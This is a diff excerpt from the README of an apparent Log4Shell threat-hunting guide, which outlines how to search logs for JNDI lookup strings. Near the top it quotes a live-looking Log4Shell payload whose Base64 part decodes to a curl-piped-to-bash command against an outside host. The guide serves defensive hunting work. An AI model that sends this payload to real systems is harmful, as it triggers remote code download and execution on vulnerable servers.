christian-taillon/log4shell-hunting/README.md

 `${jndi:ldap://caffeinatedsheep.com:12344/Basic/Command/Base64/KGN1cmwgLXMgY2FmZmVpbmF0ZWRzaGVlcC5jb206NTg3NCl8YmFzaA==}`

 ## The Hunts Outline
-Details can be found for each section bellow.
+The following are outlines for the separate hunts.
+Details on how to perform each step can be found bellow.

 ### The Hunt: Network Resource
 1. [**Scoping out a Query**](#scoping-out-a-query): Scope all relevant logs using the `${jndi\:` string.
 Create an output that you can run additional analysis on.